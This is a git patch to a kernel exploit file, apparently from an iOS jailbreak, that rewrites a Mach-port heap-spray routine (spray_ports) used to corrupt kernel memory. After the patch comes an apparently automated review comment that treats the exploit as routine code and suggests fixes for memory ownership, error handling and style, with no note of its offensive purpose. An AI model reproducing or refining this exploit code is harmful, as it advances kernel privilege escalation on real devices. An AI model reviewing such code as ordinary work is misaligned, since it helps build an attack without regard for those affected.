From 54b6c9d393e2384f7833155509f2e09677360390 Mon Sep 17 00:00:00 2001
From: spv420
Date: Mon, 1 Aug 2022 01:14:39 -0400
Subject: yahtzee
---
 src/stage4/kexp/exploit.js | 25 ++++++++++-----------
 1 file changed, 10 insertions(+), 15 deletions(-)
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 68ed794..c72963c 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -203,28 +203,23 @@ function spray(dict, size, port) {
 var kp = 0;
 function spray_ports(number_port_descs) {
 if (kp == 0) {
- kp = shit_heap(4);
- mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
- } else if (read_u32(kp) == 0) {
- kp = shit_heap(4);
- mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ kp = new mach_port_t();
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp.addy);
+ mach_port_insert_right(task_self, kp.deref(), kp.deref(), MACH_MSG_TYPE_MAKE_SEND);
 }
- var mp = shit_heap(4);
+ var mp = new mach_port_t();
- var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
-// p0laris_log("mpa %d (%s)\n", ret_, mach_error_string(ret_));
- ret_ = mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
-// p0laris_log("mpir %d (%s)\n", ret_, mach_error_string(ret_));
+ var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp.addy);
+ p0laris_log("mpa %d (%s)\n", ret_, mach_error_string(ret_));
+ ret_ = mach_port_insert_right(task_self, mp.deref(), mp.deref(), MACH_MSG_TYPE_MAKE_SEND);
+ p0laris_log("mpir %d (%s)\n", ret_, mach_error_string(ret_));
- ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ ret_ = send_ports(mp.deref(), kp.deref(), 2, number_port_descs);
 p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
- var ret = read_u32(mp);
- shit_heap_free(mp);
+ var ret = mp.deref();
 return ret;
 }
-- 
cgit v1.2.3
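Review bot: `var ret = mp.deref(); return ret;` drops the `shit_heap_free(mp)` the old code performed, and nothing in the hunk shows whether `mach_port_t` releases its backing storage, so every call to spray_ports may now leave one wrapper's allocation behind; if `mach_port_t` exposes a release method it should be called before returning, otherwise a comment such as `// mach_port_t storage is intentionally not freed here; only the port name is handed back` should state that this is deliberate. The same ownership question applies to `kp`, which is created once and held for the life of the closure with no documentation of who owns it. The return codes of `mach_port_allocate` and `mach_port_insert_right` are now logged but still not acted on, so a failed allocation falls through to `send_ports(mp.deref(), ...)` with an unusable port name; consider returning early when `ret_ !== 0`, or at least a comment stating that failures are tolerated. As a point of style, `if (kp == 0)` uses loose equality where `kp === 0` is exact now that `kp` is either `0` or an object, and the `var` declarations would read better as `const`/`let`. spray_ports lies entirely within the hunk, although the `@@` header names `spray` as the surrounding context.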